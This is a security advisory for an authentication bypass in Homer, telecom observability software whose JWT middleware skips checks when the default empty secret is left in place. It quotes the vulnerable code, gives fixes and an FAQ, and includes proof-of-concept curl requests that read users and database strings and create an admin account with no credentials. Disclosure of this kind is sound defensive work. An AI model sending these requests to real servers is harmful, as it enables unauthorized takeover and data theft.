CVE-2026-62253: Homer: Complete Authentication Bypass When coordinator.jwt.secret Is Empty (Default)
Summary Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.
Details coordinator/handlers/auth.go lines 298-304: go func (h Auth) JWTMiddleware() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // bypass — no validation performed }
coordinator/handlers/authv4helpers.go lines 177-182: go func (h Auth) JWTMiddlewareV4() echo.MiddlewareFunc { return func(next echo.HandlerFunc) echo.HandlerFunc { return func(c echo.Context) error { if h.jwtSecret == "" { return next(c) // same bypass
coordinator/coordinator.go lines 315-317: go if c.config.JWT.Secret != "" { protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty }
config/config.go line 845: Secret field struct tag has default:"". The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.
PoC bash On a default Homer installation (no JWT secret configured), all protected routes are open: curl http://<homer-host>/api/v3/users Returns full user list with no credentials
curl http://<homer-host>/api/v3/databases Returns all database connection strings
curl -X POST http://<homer-host>/api/v3/users \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}' Creates a new admin user with no credentials
Impact Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.
Fix Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions: go if h.jwtSecret == "" { log.Fatal("coordinator.jwt.secret must be set to a non-empty value") }
If possible, please apply for a CVE number when posting.
Other sources
Homer is open source telecom observability software. Prior to version 11.0.283, both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated. Version 11.0.283 patches the issue.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
go/github.com/sipcapture/homer-appto a version that resolves this vulnerability.Fixed in 0.0.0-20260625093330-5e90809657c9 - Upgrade
Upgrade
Homerto a version that resolves this vulnerability.Fixed in 11.0.283 - Configuration
Set coordinator.jwt.secret to a non-empty strong secret; startup must fail if JWT.Secret is empty.
Homer coordinator coordinator.jwt.secret = non-empty strong secret
Event History
Frequently Asked Questions
Which deployments are exposed?
Deployments using the default empty JWT secret are exposed. Protected API routes under /api/v1, /api/v3, and /api/v4 are unauthenticated in that configuration.
What does an attacker need to exploit this issue?
An attacker only needs network access to the affected API endpoints. No JWT, credentials, privileges, or user interaction are required when the JWT secret is empty.
What can be done if an update cannot be applied immediately?
Configure a non-empty JWT secret. The coordinator registers JWT middleware only when the configured JWT secret is not empty.
How can I determine whether my instance is affected?
Check the configured JWT Secret value rather than relying on the example configuration placeholder. An empty value means the JWT middleware bypasses validation and protected API endpoints are exposed.